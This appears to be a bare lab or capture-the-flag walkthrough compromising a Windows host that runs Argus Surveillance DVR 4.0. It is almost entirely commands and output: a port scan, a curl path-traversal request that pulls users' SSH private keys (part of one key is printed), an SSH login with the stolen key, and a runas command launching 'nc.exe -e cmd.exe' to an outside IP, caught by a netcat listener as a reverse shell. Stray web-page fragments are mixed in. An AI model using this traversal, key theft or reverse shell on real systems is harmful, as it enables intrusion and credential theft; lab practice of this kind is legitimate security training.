OS: Windows 10, Windows Server 2019, Windows Server 2016 OS version: '10.0' OS release: '2004' OS build: '19041'
[*] ssh found on tcp/22. Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] microsoft-ds found on tcp/445. SMB 3.0
[*] http-proxy found on tcp/8080. <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]"> About the program: Argus Surveillance DVR Program is UNREGISTERED Version: 4.0 Released 18/12/2008 Argus Surveillance Inc.
[*] msrpc found on tcp/49664. [*] msrpc found on tcp/49665. [*] msrpc found on tcp/49666. [*] msrpc found on tcp/49667. [*] msrpc found on tcp/49668. [*] msrpc found on tcp/49669.
curl"http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fadministrator%2F.ssh%2Fid_rsa" <HTML><HEAD><TITLE>File Not Found</TITLE></HEAD><BODY><H1>Cannot find this file.</H1>The requested file: <B>/WEBACCOUNT.CGI?OkBtn= Ok &RESULTPAGE=../../../../../../../../../../../../../../../../Users/administrator/.ssh/id_rsa</B> was not found.</BODY></HTML> curl"http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa" -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP iJ/njNKI0tjtpeO3rjGMkKgNKwvv3y2EcCEt1d+LxsO3Wyb5ezuPT349v+MVs7VW04+mGx pgheMgbX6HwqGSo9z38QetR6Ryxs+LVX49Bjhskz19gSF4/iTCbqoRo0djcH54fyPOm3OS
登录
1 2 3 4 5 6
ssh viewer@192.168.140.179-i viewer.id_rsa Microsoft Windows [Version10.0.19044.1645] (c) Microsoft Corporation. All rights reserved.
Privilege Name Description State ============================= ==================================== ======= SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
PS C:\> md freezeScript
Directory: C:\
Mode LastWriteTime Length Name --------------------------- d-----2/21/20259:36 AM freezeScript
Mode LastWriteTime Length Name --------------------------- d-----2/21/20259:40 AM freezeScript d-----2/21/20256:08 AM Microsoft d-----12/7/20191:14 AM PerfLogs d-r---4/15/20227:07 AM Program Files d-r---6/18/20215:55 AM Program Files (x86) d-r---12/3/202112:21 AM Users d-----4/15/20227:07 AM Windows -a----2/21/20254:52 AM 2690 output.txt
PS C:\> dir-force
Directory: C:\
Mode LastWriteTime Length Name --------------------------- d--hs-2/21/20255:06 AM $Recycle.Bin d--h--4/15/20225:02 AM $WinREAgent d--hs-4/15/20227:08 AM Config.Msi d--hsl6/18/202110:28 AM Documents and Settings d-----2/21/20259:40 AM freezeScript d-----2/21/20256:08 AM Microsoft d-----12/7/20191:14 AM PerfLogs d-r---4/15/20227:07 AM Program Files d-r---6/18/20215:55 AM Program Files (x86) d--h--12/3/202112:24 AM ProgramData d--hs-3/11/202210:03 PM Recovery d--hs-6/18/20213:31 AM System Volume Information d-r---12/3/202112:21 AM Users d-----4/15/20227:07 AM Windows -a-hs-8/1/202410:33 PM 8192 DumpStack.log.tmp -a----2/21/20254:52 AM 2690 output.txt -a-hs-8/1/202410:33 PM 671088640 pagefile.sys -a-hs-8/1/202410:33 PM 268435456 swapfile.sys
Mode LastWriteTime Length Name --------------------------- d-----12/3/202112:26 AM Gallery d-----12/3/202112:24 AM Images d-----12/3/202112:26 AM Logs -a----2/21/20259:28 AM 38 Argus Surveillance DVR.DVRSes -a----2/21/20259:45 AM 5782 DVRParams.ini
runas /env /profile /user:DVR4\Administrator "C:\temp\nc.exe -e cmd.exe 192.168.118.14 443 Enter the password for DVR4\Administrator:
1 2 3 4 5 6 7 8 9
nc -nvlp443 listening on [any] 443 ... connect to [192.168.45.234] from (UNKNOWN) [192.168.140.179] 51874 Microsoft Windows [Version10.0.19044.1645] (c) Microsoft Corporation. All rights reserved.